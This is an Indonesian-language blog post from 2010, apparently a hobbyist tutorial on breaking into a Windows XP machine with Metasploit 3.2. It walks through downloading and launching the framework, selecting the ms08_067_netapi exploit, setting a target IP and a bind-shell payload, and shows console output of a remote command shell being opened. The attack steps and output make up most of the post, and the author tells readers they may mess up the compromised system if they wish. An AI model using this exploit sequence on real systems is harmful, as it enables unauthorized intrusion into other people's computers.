Thursday 3 June 2010

Metasploit Fromwork 3.2

setelah sekian lama mencari dan mencoba tutorial fromwork akhirnya berhasil juga ngejebol sistem mindos...

oke dech langsung aja gak usah banyak basa basi entar yang ada malah basih tuch makanan hehehhe

pertama-tamax download dulu formwork nya terserah mau yang fersi mindos or linux... di sini gw download yang fersi fermwork 3.2 yang untuk linux.... ini link nya http://www.metasploit.com/framework/download/framework-3.2.tar.gz .....

nah kalo udah di dowload yang fersi untuk linux tersebut.... langsung extrak aja dechhh
nich cara extrak nya bt ~ # tar xfv framework-3.2.tar.gz.... setelah di extrak

langsung masuk dech ke folder framework nya... setelah itu ketik
bt framework-3.2 # ./msfconsole

____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ msf v3.2-release
+ -- --=[ 288 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 56 aux

msf >

....
setelah itu ikutin langkah-langkanya berikut ini,..... untuk ngeliat versinya tinggal ketik aja

msf > version
Framework: 3.2-release.5962
Console : 3.2-release.5773
msf >

setelah itu langsung ke menu untuk penetrasi sistem ketik

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >


setelah tampil seperti yang di atas....kemudian kita... kemudian ketik untuk mengarahkan host mana yang akan kita serang contonya

msf exploit(ms08_067_netapi) > show option
msf exploit(ms08_067_netapi) > set rhost 192.168.0.62
rhost => 192.168.0.6
msf exploit(ms08_067_netapi) >

setelah langkah penetrasi host di dapat dan tidak ada kesalahan kita bisa lanjut dengan payload sistem yang akan kita netrasi tersebut contoh

msf exploit(ms08_067_netapi) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
msf exploit(ms08_067_netapi) >

setelah payload tidak ada kendala langsung aja cikidot ke tkp

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (192.168.0.30:54398 -> 192.168.0.62:4444)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

nah gan sekarang tinggal acak-acak aja tuch sistem nya kalo mau ... tapi di sini gw nganjurin jangan suka ngacak-ngacak sistem oran gak baek untuk reputasi heker kita.... betul gak gak... oke sekian dulu tutorial metasploit semoga bermanfaat aminnnnnnm........................

dari kesimpulan tersebut tidak semua sistem aman, pasti semua itu mempunyai kelemahannya masing-masing.... jadi pesen gw jadilah orang yang bermanfaat minimal bagi diri sendiri....

No comments:

Post a Comment